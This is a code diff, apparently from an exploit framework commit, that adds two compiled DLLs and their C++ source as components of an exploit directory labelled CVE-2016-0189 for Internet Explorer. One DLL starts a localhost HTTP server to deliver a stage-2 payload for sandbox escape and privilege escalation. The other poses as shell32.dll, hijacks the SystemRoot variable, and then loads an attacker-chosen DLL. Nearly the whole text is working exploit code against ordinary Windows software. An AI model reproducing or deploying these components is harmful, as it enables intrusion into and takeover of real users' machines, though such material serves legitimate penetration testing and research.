sempervictus
diff --git a/‎data/exploits/cve-2016-0189/ielocalserver.dll
73.5 KB b/‎data/exploits/cve-2016-0189/ielocalserver.dll
73.5 KB
diff --git a/‎data/exploits/cve-2016-0189/ieshell32.dll
68 KB b/‎data/exploits/cve-2016-0189/ieshell32.dll
68 KB
diff --git a/‎external/source/exploits/cve-2016-0189/ielocalserver.cpp
Lines changed: 183 additions & 0 deletions b/‎external/source/exploits/cve-2016-0189/ielocalserver.cpp
Lines changed: 183 additions & 0 deletions
diff --git a/‎external/source/exploits/cve-2016-0189/ieshell32.cpp
Lines changed: 39 additions & 0 deletions b/‎external/source/exploits/cve-2016-0189/ieshell32.cpp
Lines changed: 39 additions & 0 deletions
@@ -0,0 +1,183 @@
+/*
+From: https://gist.github.com/worawit/1213febe36aa8331e092
+
+Simple local HTTP server for IE (with no AppContainer) privilege escalation.
+
+I implemented local server instead of proxy in Ref because 
+local server is easier to code. But local server is less useful then proxy.
+
+Ref:
+http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
+
+Note:
+From my test, by default IE does not configure intranet site.
+With this default, localhost is treated as internet site (run as low integrity).
+*/
+#define _CRT_SECURE_NO_WARNINGS
+#define WIN32_LEAN_AND_MEAN
+#include <winsock2.h>
+#include <stdio.h>
+#include <string.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define SERVER_PORT 5555
+
+static HANDLE hThread = NULL;
+
+static WCHAR stage2file[256];
+
+static SOCKET serverSk = INVALID_SOCKET;
+static SOCKET peerSk = INVALID_SOCKET;
+
+static SOCKET create_server()
+{
+	struct sockaddr_in skAddr;
+	SOCKET sk;
+	int optval;
+
+	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+	if (sk == INVALID_SOCKET)
+		return INVALID_SOCKET;
+
+	optval = 1;
+	setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, (char*) &optval, sizeof(optval));
+
+	memset(&skAddr, 0, sizeof(skAddr));
+	skAddr.sin_family = AF_INET;
+	skAddr.sin_port = htons(SERVER_PORT);
+	skAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+	if (bind(sk, (struct sockaddr *) &skAddr, sizeof(skAddr)) != 0)
+		goto on_error;
+
+	if (listen(sk, 5) != 0)
+		goto on_error;
+
+	return sk;
+
+on_error:
+	closesocket(sk);
+	return SOCKET_ERROR;
+}
+
+static int send_all(SOCKET sk, char *buffer, int size)
+{
+	int len;
+	while (size > 0) {
+		len = send(sk, buffer, size, 0);
+		if (len <= 0)
+			return 0;
+		buffer += len;
+		size -= len;
+	}
+
+	return 1;
+}
+
+static int local_server()
+{
+	int len;
+	int totalSize;
+	char buffer[4096];
+	HANDLE hFile = INVALID_HANDLE_VALUE;
+
+	serverSk = create_server();
+	if (serverSk == INVALID_SOCKET)
+		return SOCKET_ERROR;
+
+	while (1) {
+		peerSk = accept(serverSk, NULL, NULL);
+		if (peerSk == INVALID_SOCKET) {
+			continue;
+		}
+
+		len = recv(peerSk, buffer, sizeof(buffer), 0);
+		if (len <= 0)
+			goto closepeer;
+
+		hFile = CreateFile(stage2file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+		if (hFile == INVALID_HANDLE_VALUE)
+			break;
+
+		totalSize = GetFileSize(hFile, NULL);
+		if (totalSize == INVALID_FILE_SIZE)
+			break;
+
+		len = _snprintf(buffer, sizeof(buffer), 
+			"HTTP/1.1 200 OK\r\n"
+			"Content-Type: text/html\r\n"
+			"Connection: Close\r\n"
+			"Content-Length: %d\r\n"
+			"\r\n",
+			totalSize
+		);
+		send_all(peerSk, buffer, len);
+
+		while (totalSize > 0) {
+			ReadFile(hFile, buffer, sizeof(buffer), (DWORD*) &len, NULL);
+			send_all(peerSk, buffer, len);
+			totalSize -= len;
+		}
+		CloseHandle(hFile);
+		hFile = INVALID_HANDLE_VALUE;
+
+closepeer:
+		closesocket(peerSk);
+		peerSk = INVALID_SOCKET;
+	}
+
+	if (hFile != INVALID_HANDLE_VALUE) {
+		CloseHandle(hFile);
+	}
+	if (peerSk != INVALID_SOCKET) {
+		closesocket(peerSk);
+		peerSk = INVALID_SOCKET;
+	}
+	if (serverSk != INVALID_SOCKET) {
+		closesocket(serverSk);
+		serverSk = INVALID_SOCKET;
+	}
+
+	return 0;
+}
+
+DWORD WINAPI threadProc(void *param)
+{
+	WSADATA wsaData;
+	WSAStartup(MAKEWORD(2 ,2), &wsaData);
+
+	local_server();
+
+	WSACleanup();
+
+	DeleteFile(stage2file);
+	return 0;
+}
+
+void do_work()
+{
+	GetEnvironmentVariableW(L"stage2file", stage2file, sizeof(stage2file));
+
+	hThread = CreateThread(NULL, 0, threadProc, NULL, 0, NULL);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		do_work();
+		break;
+	case DLL_PROCESS_DETACH:
+		if (hThread) {
+			WaitForSingleObject(hThread, INFINITE);
+			CloseHandle(hThread);
+		}
+		break;
+	}
+	return TRUE;
+}
@@ -0,0 +1,39 @@
+/*
+From: https://gist.github.com/worawit/1213febe36aa8331e092
+
+Fake shell32.dll to be loaded after modified %SystemRoot%
+*/
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+static void do_work()
+{
+	WCHAR envBuffer[256];
+
+	GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
+	// restore system root
+	SetEnvironmentVariableW(L"SystemRoot", envBuffer);
+	//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
+
+	GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
+	SetEnvironmentVariableW(L"MyDllPath", NULL);
+
+	// shell32.dll will be unloaded, use another dll
+	LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
+}
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		do_work();
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}